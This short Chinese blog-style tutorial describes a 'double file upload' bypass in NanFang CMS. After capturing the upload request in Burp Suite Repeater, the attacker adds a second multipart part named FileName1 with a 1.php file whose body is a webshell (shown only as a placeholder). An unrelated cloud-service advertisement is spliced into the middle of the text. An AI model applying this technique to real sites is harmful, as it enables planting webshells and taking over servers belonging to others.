双文件上传突破利用
这个漏洞在南方cms 上出现的
主要是上传时候利用bp抓包
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。然后鼠标右键吧数据包发送到Repeater模块
找到你上传的包内容 一般是
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
图片内容
------61234564788--
改成
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
图片内容
------61234564788
Content-Disposition: form-data; name="FileName1"; filename=“1.php”
马内容
------61234564788--
更多精彩
